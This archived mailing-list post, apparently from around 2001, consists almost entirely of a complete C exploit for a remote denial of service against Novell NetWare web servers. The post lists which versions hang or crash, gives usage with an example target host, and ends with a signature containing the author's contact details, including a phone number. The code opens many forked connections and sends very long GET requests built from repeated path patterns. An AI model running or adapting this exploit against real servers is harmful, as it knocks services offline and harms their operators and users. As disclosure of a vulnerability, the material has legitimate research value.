Sorry, if it already has been published: /****************************************************************************** Novell NetWare webservers remote denial of service <venglinat_private> ******************************************************************************* Tested on: - Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1: Webserver stops responding requests for few minutes. - Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1: Whole system crash [page fault?]. - Novell NetWare ?.? with YAWN/1.05 (crc:E8B0): Webserver crash. - Novell NetWare 3.12 with YAWN/1.05 (crc:E8B0): No problems. - Novell NetWare 4.11 with YAWN/1.05 (crc:E8B0): No problems. ******************************************************************************* Usage: ./www <vulnerable_host> <http_port> <how_many_connections> <string_length> Example: ./www copernicus.9lo.lublin.pl 80 10 10000 ******************************************************************************/ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/wait.h> #define GET "GET" #define PAT1 "/" #define PAT2 "a/" #define PAT3 "../" #define PAT4 "./" long getip(char *name) { struct hostent *hp; long ip; if ((ip=inet_addr(name))==-1) { if ((hp=gethostbyname(name))==NULL) { perror("gethostbyname"); exit(1); } memcpy(&ip, (hp->h_addr), 4); } return ip; } int main (argc, argv) int argc; char **argv; { struct sockaddr_in cli; int sockfd, i, x, len; char *msg1, *msg2, *msg3, *msg4; if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]); exit(0); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_addr.s_addr=getip(argv[1]); cli.sin_port = htons(atoi(argv[2])); len = atoi(argv[4]); if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr, "len too small.\n"); exit(1); } msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1); msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1); msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1); msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1); sprintf(msg1, "%s %s", GET, PAT1); sprintf(msg2, "%s %s", GET, PAT1); sprintf(msg3, "%s %s", GET, PAT1); sprintf(msg4, "%s %s", GET, PAT1); for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1); for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2); for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3); for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4); for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork())) { if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) { perror("connect"); exit(1); } write(sockfd, msg1, strlen(msg1)); close(sockfd); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) { perror("connect"); exit(1); } write(sockfd, msg2, strlen(msg2)); close(sockfd); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) { perror("connect"); exit(1); } write(sockfd, msg3, strlen(msg3)); close(sockfd); if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { perror("socket"); exit(1); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0) { perror("connect"); exit(1); } write(sockfd, msg4, strlen(msg4)); close(sockfd); exit(0); } waitpid(x,&i,0); exit(0); } -- * Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 * * Inet: venglinat_private ** PGP:D48684904685DF43EA93AFA13BE170BF *
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:49:35 PDT